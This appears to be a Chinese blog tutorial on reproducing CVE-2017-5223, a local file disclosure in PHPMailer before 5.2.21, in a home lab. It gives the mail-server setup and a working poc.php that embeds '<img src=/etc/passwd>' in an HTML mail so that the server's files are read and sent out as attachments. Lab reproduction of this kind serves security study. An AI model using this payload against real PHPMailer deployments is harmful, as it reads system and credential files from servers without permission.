PHPMailer < 5.2.21 - Local File Disclosure（CVE-2017-5223）

　　　　CVE-2017-5223 ：PHPMailer < 5.2.21 - Local File Disclosure

　　本文主要介绍一下PHPMailer < 5.2.21 - Local File Disclosure漏洞的环境搭建和利用，关于漏洞的描述请参考下面的第二个链接。

环境搭建

说明

　　这里用到的邮件服务器是自己本地搭建的邮件服务器，我感觉其实也是可以用谷歌等邮件服务器，因为PHPMailer只是一个发送邮件的功能，跟具体接收邮件的服务器是无关的（谷歌的或是自己搭建的），为啥不能Google的呢？对，之前的两篇博客用的是Google的，换个胃口不行嘛 ~ 额，其实是Google邮件服务器总是连不上，墙外的世界我不懂 ~ 而且我本地有完备邮件系统 ~

　　关于邮件系统搭建请参考我的另外两篇博文：CentOS6 安装Sendmail + Dovecot + Squirrelmail 、 CentOS6 安装Sendmail + Dovecot + Roundcubemail

　　这两个随便选一个，主要是前面的Sendmail和Dovecot的安装配置，Webmail界面只是为了方便展示，有兴趣的可以试一下，本文用的Webmail是Squirrelmail。（如果可以随意在墙外游走，请忽略环境搭建）

邮件服务器环境介绍

　　下面简单看下本地的邮件服务器环境: CentOS6 :Sendmail + Dovecot + Squirrelmail

　　因为是局域网环境，所以在除本机外（邮件服务器），需要在hosts文件中增加一条邮件服务器的解析记录:（因为不想搭建DNS）

　　linux: 在/etc/hosts中增加如下内容：

192.168.0.6 mail.squirrelmail.com

　　这样便能正确解析：

starnight:~ starnight$ ping -c  mail.squirrelmail.com
PING mail.squirrelmail.com (192.168.0.6):  data bytes

　　打开浏览器可以通过域名进行访问：http://mail.squirrelmail.com/squirrelmail-1.4.20/src/login.php

　　邮件系统环境就演示到这里了。（再提醒一句，方便的话可以直接使用Google或其他服务器进行测试，因为搭建本地环境还是蛮费事的）

PHPMailer 环境

　　这里用的是PHPMailer-5.2.16， 为啥不用别的版本的，因为懒!最近刚好搭建过这个环境，其实换成其它的都是没有问题的，关于这部分的环境搭建，请参考：PHPMailer发送邮件(一)  中的发送邮件测试二的环境。

　　为了模仿更真实的环境，PHPMailer在另一台虚拟机上，如下，这里同样也需要在/etc/hosts文件中增加一条解析记录：192.168.0.6 mail.squirrelmail.com （同上）

　　访问如下地址：http://192.168.0.8/phpmailer-5.2.16/ 中的sendmail.php， 便能发送邮件到本地的邮件服务器环境:mail.squirrelmail.com

　　出现Message sent!，表示邮件发送成功，我们登陆一下Webmail:  http://mail.squirrelmail.com/squirrelmail-1.4.20/src/webmail.php

　　可以看到，我们已经成功的使用了PHPMailer发送邮件，并且可以跟本地的邮件服务器mail.squirrelmail.com很好的进行交互了。

　　参考sendmail.php：

<?php
#Author:Yxlink
require_once('PHPMailerAutoload.php');
$mail = new PHPMailer();
$mail->IsSMTP();
$mail->Host = "mail.squirrelmail.com";
$mail->Port = 25;
$mail->SMTPAuth = false;
$mail->SMTPSecure = false;

$mail->CharSet  = "UTF-8";
$mail->Encoding = "base64";

$mail->Username = "user1";
$mail->Password = "930901";
$mail->Subject = "Test";

$mail->From = "user1@squirrelmail.com";
$mail->FromName = "user1";  

$address = "user2@squirrelmail.com";
$mail->AddAddress($address, "user2");

//$mail->AddAttachment('test.txt','test.txt');  //test.txt可控即可任意文件读取
$mail->Subject = 'Helo, it is a test!';
$mail->Body    = 'Test mail using PHPMailer and mail.squirrelmail.com';
$mail->AltBody = 'Test mail using PHPMailer and mail.squirrelmail.com';

if(!$mail->Send()) {
  echo "Mailer Error: " . $mail->ErrorInfo;
} else {
  echo "Message sent!";
}
?>

漏洞测试

　　访问：http://192.168.0.8/phpmailer-5.2.16/下的poc.php, 同样会发送一封邮件，并且可以读取PHPMailer所在机器的文件。

　　下面是读取根目录下message.txt的情况(/message.txt)

　　读取/etc/passwd:

　　参考poc.php：

<?php
#Author:Yxlink
require_once('PHPMailerAutoload.php');
$mail = new PHPMailer();
$mail->IsSMTP();
$mail->Host = "mail.squirrelmail.com";
$mail->Port = 25;
//$mail->SMTPAuth   = true;
$mail->SMTPAuth = false;
$mail->SMTPSecure = false;

$mail->CharSet  = "UTF-8";
$mail->Encoding = "base64";

$mail->Username = "user1";
$mail->Password = "930901";
$mail->Subject = "RRRRRRRRRRRRRRR";

$mail->From = "user1@mail.squirrelmail.com";
$mail->FromName = "user1";  

$address = "user2@mail.squirrelmail.com";
$mail->AddAddress($address, "user2");

$mail->AddAttachment('test.txt','test.txt');  //test.txt可控即可任意文件读取
$mail->IsHTML(true);
$msg="<img src='/etc/passwd'>RRRRRRRRRRRRRRR";//邮件内容形如这样写。
$mail->msgHTML($msg);

if(!$mail->Send()) {
  echo "Mailer Error: " . $mail->ErrorInfo;
} else {
  echo "Message sent!";
}
?>

　　关于该漏洞的演示就到这里。

References

　　PHPMailer < 5.2.21 - Local File Disclosure

　　PHPMailer任意文件读取漏洞分析（CVE-2017-5223）　　

　  PHPMailer发送邮件(一)

　　PHPMailer 发送邮件(二)

　　CentOS6 安装Sendmail + Dovecot + Squirrelmail

　　CentOS6 安装Sendmail + Dovecot + Roundcubemail